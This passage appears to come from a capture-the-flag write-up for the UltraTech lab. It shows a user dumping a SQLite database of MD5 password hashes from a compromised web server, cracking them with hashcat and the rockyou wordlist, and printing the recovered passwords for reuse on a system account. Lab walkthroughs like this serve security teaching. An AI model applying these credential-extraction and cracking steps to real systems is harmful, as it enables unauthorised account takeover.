Database
Checking the database file after performing system enumeration
www@ultratech-prod:~/api$ ll
total 80
drwxr-xr-x 3 www www 4096 Jul 22 17:05 ./
drwxr-xr-x 9 www www 4096 Jul 22 17:07 ../
-rw-r--r-- 1 www www 1750 Mar 22 2019 index.js
drwxrwxr-x 163 www www 4096 Mar 22 2019 node_modules/
-rw-r--r-- 1 www www 370 Mar 22 2019 package.json
-rw-r--r-- 1 www www 42702 Mar 22 2019 package-lock.json
-rwxr-xr-x 1 www www 194 Jul 22 16:32 shell*
-rw-rw-r-- 1 www www 103 Mar 22 2019 start.sh
-rw-r--r-- 1 www www 8192 Mar 22 2019 utech.db.sqlite
It uses SQLite
www@ultratech-prod:~/api$ cat utech.db.sqlite
zz��etableusersusersCREATE TABLE users (
login Varchar,
password Varchar,
type Int
���(r00tf357a0c52799563c7c7b76c1e7543a32)admin0d0ea5111e3c1def594c1684e3b9be84
The utech.db.sqlite
file is in the binary format
This was also partially detected by PEAS earlier
www@ultratech-prod:~/api$ strings utech.db.sqlite
SQLite format 3
etableusersusers
CREATE TABLE users (
login Varchar,
password Varchar,
type Int
)
r00tf357a0c52799563c7c7b76c1e7543a32
admin0d0ea5111e3c1def594c1684e3b9be84
I can use strings to see it better Those are the credential hashes
Password Cracking
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ hashcat -a 0 -m 0 ./hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
f357a0c52799563c7c7b76c1e7543a32:n100906
0d0ea5111e3c1def594c1684e3b9be84:mrsheafy
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: ./hashes
Time.Started.....: Mon Jul 22 19:19:46 2024 (1 sec)
Time.Estimated...: Mon Jul 22 19:19:47 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4144.1 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new)
Progress.........: 5345280/14344386 (37.26%)
Rejected.........: 0/5345280 (0.00%)
Restore.Point....: 5342208/14344386 (37.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: mrswhite1 -> mrsburks4
Hardware.Mon.#1..: Util: 31%
Started: Mon Jul 22 19:19:44 2024
Stopped: Mon Jul 22 19:19:48 2024
Password hashes cracked;
r00t
:n100906
admin
:mrsheafy
The r00t
is a system user. The password might be reused.